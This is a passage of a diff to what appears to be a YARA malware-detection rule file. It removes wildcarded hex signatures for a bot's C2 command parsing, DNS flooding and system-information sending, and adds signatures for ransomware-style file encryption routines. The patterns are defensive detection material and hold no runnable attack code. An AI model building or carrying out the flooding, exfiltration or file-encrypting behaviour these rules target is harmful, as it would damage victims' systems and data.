-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D
-            C3
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
+            6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 55 ?? 52
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ??
+            ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13
+            45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 52 8B 45
+            ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 83 7D ?? ?? 77 ?? 81 7D
+            ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ??
+            6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ??
+            89 55 ?? 83 7D ?? ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 8B 4D ?? 51
+            8B 55 ?? 52 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52
+            50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 77
+            ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 73 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 83 7D ?? ?? 77 ?? 72
+            ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 6A
+            ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 89
+            55 ?? EB ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 55 ??
+            52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D
         }
-		$send_system_info_32 = {
-            57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
-            89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            0F 31 31 C9 89 C6 8D 44 24 ?? 31 FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44
-            24 ?? 11 D3 C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ??
-            8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 29 F1 19 FB 2B 44 24 ?? 89 4C 24 ?? 89 5C 24 ?? 69
-            C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24
-            ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B
-            5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ??
-            C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F C3
+		$encrypt_files_p2 = {
+            77 ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 77 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8B 4D ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ??
+            83 7D ?? ?? 73 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D
+            ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F
+            86 ?? ?? ?? ?? 8B 4D ?? 81 E9 ?? ?? ?? ?? 89 4D ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ??
+            50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ??
+            89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ??
+            8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ??
+            ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 0F BE 84 15
+            ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ?? 83 FA ?? 0F
+            85 ?? ?? ?? ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ??
+            0F BE 84 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ??
+            83 FA ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 8D ??
+            ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 66 A1 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 55 ?? 52 8B 45 ??
+            50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9
         }
-		$parse_c2_commands_32 = {
-            55 31 C0 57 B9 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 0F B6 94 24
-            ?? ?? ?? ?? 89 DF F3 AB C7 04 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 83 E0 ?? 89 84 24 ?? ?? ?? ?? 90 A1 ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 89 74 24 ??
-            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F
-            84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ??
-            ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB
-            8D B4 24 ?? ?? ?? ?? B0 ?? 8D BC 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? B1 ?? F3 A5 89
-            D6 8B BC 24 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85
-            ?? ?? ?? ?? 89 C1 C1 E9 ?? A8 ?? F3 A5 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 89
-            54 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3
+		$encrypt_files_p3 = {
+            6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
+            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D
+            ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A
+            ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 50 8B 45 ?? 50 FF 15 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B
+            55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ??
+            8D 45 ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ??
+            51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 6A ??
+            68 ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68
         }
-		$dns_flood_32_p1 = {
-            55 57 56 53 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? 8B
-            B4 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? F6 C3 ?? 89 DF 0F 85 ?? ?? ?? ?? 89 C1 C1 E9 ?? A8
-            ?? F3 A5 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
-            89 F7 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? F7 35 ?? ?? ??
-            ?? 8B 04 95 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 C5 8D
-            44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 AB 8D 54 24 ??
-            89 14 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 84 24 ??
-            ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 89 04 24 E8 ??
-            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 14 24 89 74 24 ?? 89 54 24 ?? C6 84 24 ?? ?? ?? ??
-            ?? C6 84 24 ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ??
-            ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54
-        }
-		$dns_flood_32_p2 = {
-            24 ?? 89 D1 8B 39 83 C1 ?? 8D 87 ?? ?? ?? ?? F7 D7 21 F8 25 ?? ?? ?? ?? 74 ?? A9 ??
-            ?? ?? ?? 0F 84 ?? ?? ?? ?? 00 C0 89 D7 83 D9 ?? 29 D1 8D 84 0C ?? ?? ?? ?? 66 C7 00
-            ?? ?? 66 C7 40 ?? ?? ?? 8B 0F 83 C7 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ??
-            74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 00 C0 8D 44 24 ?? 83 DF ?? C7 44 24 ??
-            ?? ?? ?? ?? 29 D7 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 74
-            24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 89 14 24 66 89 84 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 94 24 ?? ?? ?? ?? 89 5C 24 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
-            83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C7 ?? 89 C2
-            C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 2C 24 F7 35 ?? ?? ?? ??
-            8B 04 95 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44
-            24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 80 ?? ?? ?? ?? ?? 83 90 ?? ?? ?? ?? ??
-            83 3D ?? ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8
-        }
-		$collect_system_information_64_p1 = {
-            41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ??
-            ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ??
-            ?? 0F 31 48 89 D3 48 8D 7C 24 ?? 31 F6 48 C1 E3 ?? 89 C0 48 01 C3 E8 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24 ?? 31 F6 48 C1 E5 ?? 89 C0 45
-            31 E4 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 44 24 ?? 48 29 DD 48 8B 54 24 ??
-            2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 48 8D AC 24 ?? ?? ?? ?? 69 C0 ?? ?? ?? ??
-            01 D0 F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ??
-            ?? ?? ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05
-            ?? ?? ?? ?? BF ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE
-            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3 48 AB
+		$encrypt_files_p4 = {
+            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 87 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 75 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 69 55 ?? ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ??
+            ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B
+            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
+            ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 51 6A
+            ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ??
+            51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ??
+            51 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF
+            15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A
+            ?? 69 45 ?? ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ??
+            50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55
+            ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
         }
-		$collect_system_information_64_p2 = {
-            48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24
-            ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9
-            ?? ?? ?? ?? 48 89 DF F3 48 AB 8B 44 24 ?? BE ?? ?? ?? ?? 48 89 DF 8D 90 ?? ?? ?? ??
-            85 C0 0F 49 D0 31 C0 C1 FA ?? 89 54 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE ??
-            ?? ?? ?? BF ?? ?? ?? ?? 41 89 C5 E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3
-            48 AB 48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 85
-            ED 75 ?? BA ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF
-            ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ?? 31 C9
-            BA ?? ?? ?? ?? 31 F6 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D C3
+		$encrypt_files_p5 = {
+            E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8A 0D ?? ?? ?? ?? 88 4D ?? 33 D2 89 55
+            ?? 89 55 ?? 89 55 ?? 89 55 ?? 88 55 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
+            ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 33 C9 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50
+            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
+            ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 45 ?? 50 8D 4D ??
+            51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ??
+            75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ??
+            50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ??
+            ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8B 4D
+            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B
         }
-		$send_system_info_64 = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48
-            8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ??
-            ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D3 31 F6 48 89 E7 48 C1 E3 ?? 89
-            C0 48 01 C3 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24
-            ?? 31 F6 89 C0 48 C1 E5 ?? 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 04 24 48 29
-            DD 48 8B 54 24 ?? 2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 69 C0 ?? ?? ?? ?? 01 D0
-            F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ?? ?? ??
-            ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? BA ?? ?? ?? ??
-            BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? BA ?? ?? ?? ??
-            BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5D C3
+		$encrypt_files_p6 = {
+            45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ??
+            52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D
